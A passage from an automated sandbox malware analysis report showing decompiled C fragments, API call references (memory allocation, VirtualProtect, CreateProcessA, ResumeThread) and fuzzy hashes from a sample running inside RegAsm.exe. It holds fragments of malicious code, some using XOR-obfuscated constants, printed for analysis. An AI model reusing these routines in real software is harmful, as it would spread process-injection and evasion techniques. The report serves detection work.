				return _t20;
			}

0x010a1cc5
0x010a1cc9
0x010a1d08
0x010a1ccb
0x010a1ccf
0x010a1cd6
0x010a1cde
0x010a1ce4
0x010a1cec
0x010a1cf7
0x010a1cfd
0x010a1cff
0x010a1cff
0x010a1d0d

APIs

lstrlenW.KERNEL32(74E5F710,00000000,?,010A2186,00000000,?,74E5F710,00000000,74E5F730,?,?,?,?,010A675D,?,00000001), ref: 010A1CB5

Part of subcall function 010A4573: RtlAllocateHeap.NTDLL(00000000,00000000,010A5A3F), ref: 010A457F

wsprintfW.USER32 ref: 010A1CDE

Part of subcall function 010A559F: memset.NTDLL ref: 010A55C3
Part of subcall function 010A559F: Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 010A55FF
Part of subcall function 010A559F: GetLastError.KERNEL32 ref: 010A560F
Part of subcall function 010A559F: Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 010A5620

Part of subcall function 010A2625: RtlFreeHeap.NTDLL(00000000,00000000,010A5AE0,00000000,00000000,00000000,00000000,?,?,?,?,?,010A11F4,00000000), ref: 010A2631

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: Wow64$EnableHeapRedirection$AllocateErrorFreeLastlstrlenmemsetwsprintf
String ID:
API String ID: 1174530276-0
Opcode ID: e4b508bb513da077d7283dd99cef60c03c5feeb2f27e5a2d6991b2d0d221ed71
Instruction ID: 2bf0139c19c7c626d7b3c5cdd65ca2e8f671e557a2a6ef98eccaf54d6b1d4566
Opcode Fuzzy Hash: e4b508bb513da077d7283dd99cef60c03c5feeb2f27e5a2d6991b2d0d221ed71
Instruction Fuzzy Hash: 93F0BE32600602EBC720ABA8DC48E9ABBACEB88660F824422F2C4C7155DA79D410C791

Uniqueness

Uniqueness Score: -1.00%

Function 03F038A8, Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(03F2C300), ref: 03F038B2
RtlLeaveCriticalSection.NTDLL(03F2C300), ref: 03F038EE

Part of subcall function 03F0C9AB: lstrlen.KERNEL32(?,?,00000000,?,03F217F9,00000000,00000001,?,00000000,00000000,00000000,03F2B928,00000001), ref: 03F0C9F8
Part of subcall function 03F0C9AB: VirtualProtect.KERNEL32(00000000,00000000,00000040,00000200,?,00000000,?,03F217F9,00000000,00000001,?,00000000,00000000,00000000,03F2B928,00000001), ref: 03F0CA0A
Part of subcall function 03F0C9AB: lstrcpy.KERNEL32(00000000,?), ref: 03F0CA19
Part of subcall function 03F0C9AB: VirtualProtect.KERNEL32(00000000,00000000,00000200,00000200,?,00000000,?,03F217F9,00000000,00000001,?,00000000,00000000,00000000,03F2B928,00000001), ref: 03F0CA2A

Part of subcall function 03F04CF5: RtlFreeHeap.NTDLL(00000000,00000000,03F0194B,00000000), ref: 03F04D01

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
String ID:
API String ID: 1872894792-0
Opcode ID: 8947ffd503921ea59263a9cde141041ed30e87174f70eca9af2451e49ff5ce88
Instruction ID: 2a5ae3f7719ccefe93e6eddc4cb6c38bddfa70c65db181b6f69f40f99e23c933
Opcode Fuzzy Hash: 8947ffd503921ea59263a9cde141041ed30e87174f70eca9af2451e49ff5ce88
Instruction Fuzzy Hash: 9AF0EC7B60121DDFC720FF5D98C486DFFA8EF8622131601AEE95597351CB725C0096C0

Uniqueness

Uniqueness Score: -1.00%

Function 010A3E38, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x10aa294) == 0) {
						E010A2F9F();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x10aa294) == 1) {
						_t10 = E010A1B37(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x010a3e3f
0x010a3e40
0x010a3e43
0x010a3e75
0x010a3e77
0x010a3e77
0x010a3e45
0x010a3e46
0x010a3e5b
0x010a3e62
0x010a3e64
0x010a3e64
0x010a3e62
0x010a3e46
0x010a3e7f

APIs

InterlockedIncrement.KERNEL32(010AA294), ref: 010A3E4D

Part of subcall function 010A1B37: HeapCreate.KERNELBASE(00000000,00400000,00000000,00000001,?,?,010A3E60,?), ref: 010A1B48

InterlockedDecrement.KERNEL32(010AA294), ref: 010A3E6D

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 4b161a19828e22b6b8feaae846b91ded043b27eb8224c314b667439c5f15e996
Instruction ID: 9e112faa3edc504898c109ba7535cd9b00820d8d78c85f1f3db257d751cc1a86
Opcode Fuzzy Hash: 4b161a19828e22b6b8feaae846b91ded043b27eb8224c314b667439c5f15e996
Instruction Fuzzy Hash: 94E04F35344222AB96B2A6FC9804B9F7B98BB15B80FC00468F7D1DD0D5D725C450C391

Uniqueness

Uniqueness Score: -1.00%

Function 03F141AB, Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03F0B588: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 03F0B5C1
Part of subcall function 03F0B588: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 03F0B5F7
Part of subcall function 03F0B588: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 03F0B603
Part of subcall function 03F0B588: lstrcmpi.KERNEL32(?,00000000), ref: 03F0B640
Part of subcall function 03F0B588: StrChrA.SHLWAPI(?,0000002E), ref: 03F0B649
Part of subcall function 03F0B588: lstrcmpi.KERNEL32(?,00000000), ref: 03F0B65B
Part of subcall function 03F0B588: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 03F0B6AC

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000010,?,?,?,03F285A0,0000002C,03F1E6A6,043A8E6E,?,00000000,03F05DD7), ref: 03F141EA

Part of subcall function 03F08C10: GetProcAddress.KERNEL32(?,00000000), ref: 03F08C39
Part of subcall function 03F08C10: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,03F069EC,00000000,00000000,00000028,00000100), ref: 03F08C5B

VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,03F285A0,0000002C,03F1E6A6,043A8E6E,?,00000000,03F05DD7,?,00000318), ref: 03F14275

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
String ID:
API String ID: 4138075514-0
Opcode ID: f9b5dceb6e455b945bb739f511ca59b5da58500019a592c0df58ad719b6cebd4
Instruction ID: b20c3d24f8c6f52c7c0865f87b591d0449c5df99dad43122c6aaf82553a08b42
Opcode Fuzzy Hash: f9b5dceb6e455b945bb739f511ca59b5da58500019a592c0df58ad719b6cebd4
Instruction Fuzzy Hash: 9121F375D01229EBCF11DFA5DC80ADEFBB4BF48720F14812AE914B6250C3349A91CF60

Uniqueness

Uniqueness Score: -1.00%

Function 010A1398, Relevance: 2.6, APIs: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E010A1398(intOrPtr _a4, signed int _a8) {
				long _v8;
				long _v12;
				char _v16;
				void* _t14;
				long _t15;
				char* _t17;
				intOrPtr* _t19;
				signed int _t22;

				_t19 = __imp__; // 0x6fa0e700
				_t22 =  ~_a8;
				_v12 = 0;
				asm("sbb esi, esi");
				while(1) {
					_v8 = 0;
					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = GetLastError();
					_v8 = _t15;
					if(_t15 != 0x2f8f) {
						if(_t15 == 0x2f00) {
							continue;
						}
					} else {
						_v16 = 0x3300;
						if(_v12 == 0) {
							_t17 =  &_v16;
							__imp__(_a4, 0x1f, _t17, 4);
							if(_t17 == 0) {
								_v8 = GetLastError();
							} else {
								_v12 = 1;
								continue;
							}
						}
					}
					L9:
					return _v8;
				}
				goto L9;
			}

0x010a139f
0x010a13ac
0x010a13ae
0x010a13b1
0x010a13f6
0x010a13fe
0x010a1404
0x010a1408
0x00000000
0x00000000
0x010a13b5
0x010a13c0
0x010a13c3
0x010a13f4
0x00000000
0x00000000
0x010a13c5
0x010a13c8
0x010a13cf
0x010a13d3
0x010a13dc
0x010a13e4
0x010a1412
0x010a13e6
0x010a13e6
0x00000000
0x010a13e6
0x010a13e4
0x010a13cf
0x010a1415
0x010a141c
0x010a141c
0x00000000

APIs

GetLastError.KERNEL32 ref: 010A13B5
GetLastError.KERNEL32 ref: 010A140C

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 285cacf51f5117ce73bd2d2f61eeff89f5676699f3c6bde8e5d66a5bd32e8ffb
Instruction ID: a95ee54cd736955236cf753368b4c84df439c36cee3e9020d377c65100b3c46d
Opcode Fuzzy Hash: 285cacf51f5117ce73bd2d2f61eeff89f5676699f3c6bde8e5d66a5bd32e8ffb
Instruction Fuzzy Hash: 0A01C031900208FFDF209FDAD848DDEBFB8EB85354F8081AAF541E6141DB718680CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00401BC7, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00401BC7(void* __ecx) {
				void* _v8;
				char _v12;
				signed short _t15;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E0040193B( &_v8,  &_v12,  *0x404180 ^ 0x13b675ce) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E0040203A(_t22, _v8,  *0x404180 ^ 0x64927f78);
					}
					if(_t29 != 0) {
						_t15 = E00401AFE(_t22); // executed
						_v12 = _t15 & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x404160, 0, _v8);
				}
				return _t25;
			}

0x00401bc7
0x00401bca
0x00401bcb
0x00401be1
0x00401bea
0x00401bef
0x00401c08
0x00401bf1
0x00401c04
0x00401c04
0x00401c0c
0x00401c0e
0x00401c16
0x00401c1e
0x00401c26
0x00401c28
0x00401c28
0x00401c26
0x00401c38
0x00401c38
0x00401c43

APIs

StrStrIA.KERNELBASE(00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,004014B3), ref: 00401C1E
HeapFree.KERNEL32(00000000,?,?,00000000,?,00000000,00000000,?,?,?,004014B3), ref: 00401C38

Memory Dump Source

Source File: 00000008.00000002.521792829.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.521817363.0000000000405000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.521835908.0000000000407000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: a29e366d808889bced01fab52383e038ff7e0e06e3af8f77fde6dce93ab68703
Instruction ID: 960a8f31c3e68a18a794f9012253056ada298366aac22a5afdd0c6dc3360f8f6
Opcode Fuzzy Hash: a29e366d808889bced01fab52383e038ff7e0e06e3af8f77fde6dce93ab68703
Instruction Fuzzy Hash: C201A7B2A05118BBDB11DBA2DD059AF7BBCEB84741F11017BFA01F72A0D634DE019768

Uniqueness

Uniqueness Score: -1.00%

Function 03F13713, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000001,00000000,74E04D40,?,?,00000000,03F21CE8), ref: 03F13728

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 748fc2e245b61826cef3a79bdac772a4f72b5bdede024e4d85692f01a37d8379
Instruction ID: 29ca13d7e3eea5e9977261a72f2fc58589807f7f348b1e2605057c92eea699c7
Opcode Fuzzy Hash: 748fc2e245b61826cef3a79bdac772a4f72b5bdede024e4d85692f01a37d8379
Instruction Fuzzy Hash: BF3164BBE00219EFCB21DF98D891D9DBBB9FB44714F5880AAD604AB254D370AD51CF50

Uniqueness

Uniqueness Score: -1.00%

Function 010A5B45, Relevance: 1.6, APIs: 1, Instructions: 75
memoryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E010A5B45(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0x10aa290, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}

0x010a5b4a
0x010a5b4f
0x010a5b5d
0x010a5b63
0x010a5b67
0x010a5bd8
0x010a5b69
0x010a5b6d
0x010a5b70
0x010a5b73
0x010a5b7a
0x010a5b7b
0x010a5b7c
0x010a5b80
0x010a5b83
0x010a5b8a
0x010a5b90
0x010a5b91
0x010a5b91
0x010a5b98
0x010a5b99
0x010a5b9a
0x010a5b9e
0x010a5baa
0x010a5bb0
0x010a5bb1
0x010a5bb1
0x010a5bb3
0x010a5bb9
0x010a5bbb
0x010a5bc0
0x010a5bc1
0x010a5bc1
0x010a5bc7
0x010a5bd0
0x010a5bd2
0x010a5bd5
0x010a5be4

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 010A5B5D

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3dc17ff0f7e0fec3f57d2abc0c223b84d6d8304fed0511384b2792089a132650
Instruction ID: f424cdd1323a9eac0d915a85e9044e48cdc73a2e78426fcf9d86dd345b238294
Opcode Fuzzy Hash: 3dc17ff0f7e0fec3f57d2abc0c223b84d6d8304fed0511384b2792089a132650
Instruction Fuzzy Hash: F61136312953449FEB068F2CC851BE97FA5EB17359F6440CAE5808B392C27B850BCB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F0F1B9, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(03F11BE5,03F2B7A0,-0000000C,00000000,?,?,03F11BE7,0000000C,00000000,?), ref: 03F0F1F4

Part of subcall function 03F0D274: NtQueryInformationProcess.NTDLL(00000000,00000402,00000018,00000000,03F2C300), ref: 03F0D28B

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: HandleInformationModuleProcessQuery
String ID:
API String ID: 2776635927-0
Opcode ID: 0321dd864900fda461576b4f8a76cb305d5e3daac3e0c851e15e04aad822cae0
Instruction ID: e0d0c7a51dff39321a704c36a83f9c15d06ab4840aa33ab0a23beaa280f1f6c8
Opcode Fuzzy Hash: 0321dd864900fda461576b4f8a76cb305d5e3daac3e0c851e15e04aad822cae0
Instruction Fuzzy Hash: 7521A57AE00306AFDF30CF9DC980A6AB7A9FF816907188429E959CB190D770ED01EB50

Uniqueness

Uniqueness Score: -1.00%

Function 03F16F3A, Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 03F16F8C

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0adb06e3f059042700dd5b2f8de2da24c4c37519ecd9be4ab51a1d5295e68464
Instruction ID: 9724b4950c9f4f6553b28225917b050dc6063e075788e8e115bb29119dd553ba
Opcode Fuzzy Hash: 0adb06e3f059042700dd5b2f8de2da24c4c37519ecd9be4ab51a1d5295e68464
Instruction Fuzzy Hash: 7C11DB3660420AAFDF119FA9DC409DA7BAAFF48374B098125FE1996160D735DC31DF90

Uniqueness

Uniqueness Score: -1.00%

Function 010A56F0, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E010A56F0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x10aa2d4; // 0x235d5a8
				_t4 = _t15 + 0x10ab394; // 0x340893c
				_t20 = _t4;
				_t6 = _t15 + 0x10ab124; // 0x650047
				_t17 = E010A3673(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E010A1C56(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x010a56fa
0x010a56fc
0x010a5703
0x010a5704
0x010a5705
0x010a5706
0x010a570c
0x010a5711
0x010a5711
0x010a571b
0x010a572d
0x010a5734
0x010a5763
0x010a5736
0x010a573b
0x010a5760
0x010a573d
0x010a5740
0x010a5747
0x010a5752
0x010a5749
0x010a574c
0x010a574c
0x010a5756
0x010a5756
0x010a573b
0x010a576a

APIs

Part of subcall function 010A3673: SysFreeString.OLEAUT32(?), ref: 010A3752

Part of subcall function 010A1C56: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,010A240B,004F0053,00000000,?), ref: 010A1C5F
Part of subcall function 010A1C56: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,010A240B,004F0053,00000000,?), ref: 010A1C89
Part of subcall function 010A1C56: memset.NTDLL ref: 010A1C9D

SysFreeString.OLEAUT32(00000000), ref: 010A5756

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 4ed09e3293da132ec375f0169d1b0b3f31e6f008e73113b1b0ac1e1935a6e439
Instruction ID: 23b4d205732f4921603d5fb5ab19d4f91d1dbbd2dea31a082ab31c1fd241bb6d
Opcode Fuzzy Hash: 4ed09e3293da132ec375f0169d1b0b3f31e6f008e73113b1b0ac1e1935a6e439
Instruction Fuzzy Hash: 6B019A32600029FFDB219FE8ED04CEEBBB9FB08A14F804465EA81F6060E771A9158791

Uniqueness

Uniqueness Score: -1.00%

Function 03F0195D, Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON

Download Yara Rule

APIs

Part of subcall function 03F21206: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,03F2C140,00000000,03F01964,?,03F0E707,?), ref: 03F21225
Part of subcall function 03F21206: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,03F2C140,00000000,03F01964,?,03F0E707,?), ref: 03F21230
Part of subcall function 03F21206: _wcsupr.NTDLL ref: 03F2123D
Part of subcall function 03F21206: lstrlenW.KERNEL32(00000000), ref: 03F21245

ResumeThread.KERNEL32(00000004,?,03F0E707,?), ref: 03F01972

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
String ID:
API String ID: 3646851950-0
Opcode ID: bb85b06132de8555a0e01742a5fd47b1c8e4aedd1cfb1393bb478c12ddcc7df3
Instruction ID: 38089680d06863b900e7826e28d0f705aeb4e6991ceaf5a39d8256aeb4d17a79
Opcode Fuzzy Hash: bb85b06132de8555a0e01742a5fd47b1c8e4aedd1cfb1393bb478c12ddcc7df3
Instruction Fuzzy Hash: AAD0A73C604311EAD631F754CD05B1FBD959F20B40F048554F9CAC50E1C3718410F615

Uniqueness

Uniqueness Score: -1.00%

Function 010A7B16, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010A7B16() {

				E010A7BF6(0x10a9344, 0x10aa140); // executed
				goto __eax;
			}

0x010a7b28
0x010a7b2f

APIs

___delayLoadHelper2@8.DELAYIMP ref: 010A7B28

Part of subcall function 010A7BF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 010A7C6F

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 94eaa275d633699dc12e0fc9fa0d6a39085d4b0054e56fc071419c4313a33dc2
Instruction ID: 734cc3574224520870778e02ea44d265305be9e2b9ac5b51db5f2a45693bf828
Opcode Fuzzy Hash: 94eaa275d633699dc12e0fc9fa0d6a39085d4b0054e56fc071419c4313a33dc2
Instruction Fuzzy Hash: DAB012E2379002FD310812CE5C16E7F111CD0C4E153E0C01EFAC1C8080E841AC000031

Uniqueness

Uniqueness Score: -1.00%

Function 010A7B31, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010A7B31() {

				E010A7BF6(0x10a9344, 0x10aa150); // executed
				goto __eax;
			}

0x010a7b28
0x010a7b2f

APIs

___delayLoadHelper2@8.DELAYIMP ref: 010A7B28

Part of subcall function 010A7BF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 010A7C6F

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 43d7d0f63cd90f09c292af2a0a83d871e4615b3796fb63f8a145a5d9f95180bd
Instruction ID: 9f656b01cfca47ef27a90f6cf0081b499be3c2f09a36f743bc9319f035e317c6
Opcode Fuzzy Hash: 43d7d0f63cd90f09c292af2a0a83d871e4615b3796fb63f8a145a5d9f95180bd
Instruction Fuzzy Hash: 09B012C2379003FC314452CD5C16E7B115CD0C0D153E0C41EFAC1C9280E8415C040131

Uniqueness

Uniqueness Score: -1.00%

Function 010A4573, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010A4573(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x10aa290, 0, _a4); // executed
				return _t2;
			}

0x010a457f
0x010a4585

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,010A5A3F), ref: 010A457F

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: edc29eecd958c8022fc7bd3a487b2f81699a631385061461b46c02a0a805958a
Instruction ID: b3ce8c85d78a75d68d2f3c500c7fd7db348001d1469f1e42006589355214a164
Opcode Fuzzy Hash: edc29eecd958c8022fc7bd3a487b2f81699a631385061461b46c02a0a805958a
Instruction Fuzzy Hash: 97B01235644500EFCA224B40DD08F877B22B754B00F404010B388440A8C2370430EB05

Uniqueness

Uniqueness Score: -1.00%

Function 03F163A7, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
